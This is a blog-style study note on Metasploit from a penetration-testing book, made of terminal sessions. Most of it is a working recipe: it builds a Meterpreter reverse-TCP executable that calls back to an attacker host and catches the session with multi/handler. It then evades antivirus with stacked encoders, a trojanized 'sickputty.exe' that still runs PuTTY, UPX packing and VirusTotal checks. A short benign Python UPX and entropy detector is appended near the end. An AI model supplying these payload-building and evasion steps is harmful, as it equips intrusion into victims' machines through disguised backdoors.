好记性不如铅笔头


Reading notes on 《魔鬼训练营》: using msfpayload, and AV-evasion tools

!!! These notes are for study and exchange only; do not use them for any other purpose !!!


How to use msfpayload:

Generating a payload with msfpayload:

root@kali:~# msfpayload

    Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>

OPTIONS:

    -h        Help banner
    -l        List available payloads

#==>> List the available payloads:
root@kali:~# msfpayload -l

Framework Payloads (335 total)
==============================

    Name                                             Description
    ----                                             -----------
......
......
#==>> Select a payload and append "O" (capital letter O) to view its options:
root@kali:~# msfpayload windows/meterpreter/reverse_tcp O

       Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
     Module: payload/windows/meterpreter/reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 287
       Rank: Normal

Provided by:
  skape <mmiller@hick.org>
  sf <stephen_fewer@harmonysecurity.com>
  hdm <hdm@metasploit.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
LHOST     10.10.10.130     yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to the attacker, Inject the meterpreter server DLL via 
  the Reflective Dll Injection payload (staged)

#==>> LHOST and LPORT are already correct, so generate the executable directly
root@kali:~# msfpayload windows/meterpreter/reverse_tcp  X > test.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 287
Options: {"LHOST"=>"10.10.10.130"}

Upload the executable to the Windows XP SP2 machine, then enter msf:

#==>> First, find the matching module
msf > search multi/handler

Matching Modules
================

   Name                                               Disclosure Date          Rank       Description
   ----                                               ---------------          ----       -----------
......
   exploit/multi/handler                                                       manual     Generic Payload Handler
......

msf > use  exploit/multi/handler
msf exploit(handler) > show payloads
......
#==>> Choose the payload that matches the generated exe
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options  #==>> View and modify the options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 10.10.10.130
LHOST => 10.10.10.130
msf exploit(handler) > exploit
#==>> Once msf is listening, run test.exe on the XP machine and you will see the session open

[*] Started reverse handler on 10.10.10.130:4444 
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 10.10.10.132
[*] Meterpreter session 1 opened (10.10.10.130:4444 -> 10.10.10.132:1047) at 2014-05-12 17:44:06 +0800
meterpreter > #==>> Session established

A payload generated directly by msfpayload is very easily detected as a trojan, so some AV-evasion processing is needed. First, a link worth noting: 【 https://www.virustotal.com/zh-cn 】, which scans a file against many AV engines online.

msfencode:

root@kali:~/payloadtest# msfencode -h

    Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>

OPTIONS:

    -a <opt>  The architecture to encode as
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -c <opt>  The number of times to encode the data
    -d <opt>  Specify the directory in which to look for EXE templates
    -e <opt>  The encoder to use
    -h        Help banner
    -i <opt>  Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m <opt>  Specifies an additional module search path
    -n        Dump encoder information
    -o <opt>  The output file
    -p <opt>  The platform to encode for
    -s <opt>  The maximum size of the encoded data
    -t <opt>  The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war
    -v        Increase verbosity
    -x <opt>  Specify an alternate executable template

#==>> Available encoders
root@kali:~/payloadtest# msfencode -l

Framework Encoders
==================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/generic_sh                good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Generic ${IFS} Substitution Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder (optimised)
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

Simple usage examples:

#==>> Generate the payload with msfpayload, output it as raw data with the R keyword, pipe it with | into msfencode, encode once with shikata_ga_nai, and write the result in exe format as test2.exe
root@kali:~/payloadtest# msfpayload windows/meterpreter/reverse_tcp R | msfencode -e x86/shikata_ga_nai -c 1 -t exe -o test2.exe
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

#==>> Generate the payload with msfpayload, output it as raw data with the R keyword and save it to test.raw; then have msfencode encode it once with shikata_ga_nai, reading input from test.raw and writing the exe output as test3.exe
root@kali:~/payloadtest# msfpayload windows/meterpreter/reverse_tcp R > test.raw
root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -t exe -i test.raw -o test3.exe
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

#==>> Have msfencode encode test.raw once with shikata_ga_nai and output raw data, then pipe that raw output into a second msfencode, which encodes it once more with countdown and writes the exe output as test4.exe
root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1  -i test.raw  -t raw | msfencode -e x86/countdown -c 1 -t exe -o test4.exe
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

[*] x86/countdown succeeded with size 332 (iteration=1)

#==>> Have msfencode encode test.raw once with shikata_ga_nai and write the exe output as sickputty.exe; instead of the default exe template, use putty.exe as the template (-x option), and with the -k option the resulting sickputty.exe still runs putty when executed
root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -t exe -i test.raw -o sickputty.exe -x ./putty.exe -k
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

UPX:

root@kali:~/payloadtest# upx
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                        -l    list compressed file
  -t     test compressed file              -V    display version number
  -h     give more help                    -L    display software license
Options:
  -q     be quiet                          -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress

Type 'upx --help' for more detailed help.

UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net
root@kali:~/payloadtest# upx -h
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
  -1     compress faster                   -9    compress better
  --best compress best (can be slow for big files)
  -d     decompress                        -l    list compressed file
  -t     test compressed file              -V    display version number
  -h     give this help                    -L    display software license

Options:
  -q     be quiet                          -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  --no-color, --mono, --color, --no-progress   change look

Compression tuning options:
  --brute             try all available compression methods & filters [slow]
  --ultra-brute       try even more compression variants [very slow]

Backup options:
  -k, --backup        keep backup files
  --no-backup         no backup files [default]

Overlay options:
  --overlay=copy      copy any extra data attached to the file [default]
  --overlay=strip     strip any extra data attached to the file [DANGEROUS]
  --overlay=skip      don't compress a file with an overlay

Options for djgpp2/coff:
  --coff              produce COFF output [default: EXE]

Options for dos/com:
  --8086              make compressed com work on any 8086

Options for dos/exe:
  --8086              make compressed exe work on any 8086
  --no-reloc          put no relocations in to the exe header

Options for dos/sys:
  --8086              make compressed sys work on any 8086

Options for ps1/exe:
  --8-bit             uses 8 bit size compression [default: 32 bit]
  --8mib-ram          8 megabyte memory limit [default: 2 MiB]
  --boot-only         disables client/host transfer compatibility
  --no-align          don't align to 2048 bytes [enables: --console-run]

Options for watcom/le:
  --le                produce LE output [default: EXE]

Options for win32/pe, rtm32/pe & arm/pe:
  --compress-exports=0    do not compress the export section
  --compress-exports=1    compress the export section [default]
  --compress-icons=0      do not compress any icons
  --compress-icons=1      compress all but the first icon
  --compress-icons=2      compress all but the first icon directory [default]
  --compress-icons=3      compress all icons
  --compress-resources=0  do not compress any resources at all
  --keep-resource=list    do not compress resources specified by list
  --strip-relocs=0        do not strip relocations
  --strip-relocs=1        strip relocations [default]

file..   executables to (de)compress

This version supports:
    AMD64-darwin.macho               Mach/AMD64
    ARMEL-darwin.macho               Mach/ARMEL
    amd64-linux.elf                  linux/ElfAMD
    amd64-linux.kernel.vmlinux       vmlinux/AMD64
    arm-linux.elf                    linux/armel
    arm-linux.kernel.vmlinux         vmlinux/armel
    arm-wince.pe                     arm/pe
    armeb-linux.elf                  linux/armeb
    armeb-linux.kernel.vmlinux       vmlinux/armeb
    armel-linux.kernel.vmlinuz       vmlinuz/armel
    fat-darwin.macho                 Mach/fat
    i086-dos16.com                   dos/com
    i086-dos16.exe                   dos/exe
    i086-dos16.sys                   dos/sys
    i386-bsd.elf.execve              BSD/386
    i386-darwin.macho                Mach/i386
    i386-dos32.djgpp2.coff           djgpp2/coff
    i386-dos32.tmt.adam              tmt/adam
    i386-dos32.watcom.le             watcom/le
    i386-freebsd.elf                 BSD/elf386
    i386-linux.elf                   linux/elf386
    i386-linux.elf.execve            linux/386
    i386-linux.elf.shell             linux/sh386
    i386-linux.kernel.bvmlinuz       bvmlinuz/386
    i386-linux.kernel.vmlinux        vmlinux/386
    i386-linux.kernel.vmlinuz        vmlinuz/386
    i386-netbsd.elf                  netbsd/elf386
    i386-openbsd.elf                 opnbsd/elf386
    i386-win32.pe                    win32/pe
    m68k-atari.tos                   atari/tos
    mips-linux.elf                   linux/mipseb
    mipsel-linux.elf                 linux/mipsel
    mipsel.r3000-ps1                 ps1/exe
    powerpc-darwin.macho             Mach/ppc32
    powerpc-linux.elf                linux/ElfPPC
    powerpc-linux.kernel.vmlinux     vmlinux/ppc32

UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net
root@kali:~/payloadtest# 

Simple usage example:

#==>> Compress test4.exe at compression level 5
root@kali:~/payloadtest# upx -5 test4.exe 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     73802 ->     48128   65.21%    win32/pe     test4.exe                     

Packed 1 file.
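As an added defender-side check (my own example, not code from the book or from the notes above): a small PE section inspector that flags the UPX0/UPX1/UPX2 section names UPX writes into the binaries it packs, and reports any section whose byte entropy reaches a threshold (7.0 bits per byte is an assumed heuristic), which is what packed or encoded payload data looks like regardless of section name. The PE images it scans are constructed inline as header-only skeletons, not real or loadable binaries.

```python
import math
import struct

UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}  # names UPX gives the sections it packs

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, close to 8.0 for compressed or encoded data."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_sections(image: bytes):
    """Yield (name, raw_bytes) for every entry in the PE section table."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[:2] != b"MZ" or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4  # 20-byte COFF file header follows the PE signature
    nsec = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size  # section table follows the optional header
    for i in range(nsec):
        off = table + i * 40  # each section header is 40 bytes
        name = image[off:off + 8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)
        yield name, image[raw_ptr:raw_ptr + raw_size]

def scan(image: bytes, threshold: float = 7.0) -> dict:
    """Report UPX section names and sections whose entropy reaches the threshold."""
    found = {"upx_sections": [], "high_entropy": []}
    for name, data in pe_sections(image):
        if name in UPX_SECTION_NAMES:
            found["upx_sections"].append(name.decode())
        if shannon_entropy(data) >= threshold:
            found["high_entropy"].append(name.decode())
    found["suspicious"] = bool(found["upx_sections"] or found["high_entropy"])
    return found

def build_sample_pe(sections) -> bytes:
    """Constructed test data: a header-only PE skeleton (no optional header, not loadable)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    ptr, table, blobs = 0x40 + 4 + 20 + 40 * len(sections), b"", b""
    for name, data in sections:
        hdr = struct.pack("<IIIIIIHHI", len(data), 0x1000, len(data), ptr, 0, 0, 0, 0, 0x60000020)
        table, blobs, ptr = table + name.ljust(8, b"\0") + hdr, blobs + data, ptr + len(data)
    return dos + b"PE\0\0" + coff + table + blobs
```

A real scan would read the file with `open(path, "rb").read()` and pass it to `scan`; the section names alone are trivial to rename, so the entropy result is the more durable signal.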

Other reference links:

http://www.offensive-security.com/metasploit-unleashed/Msfpayload
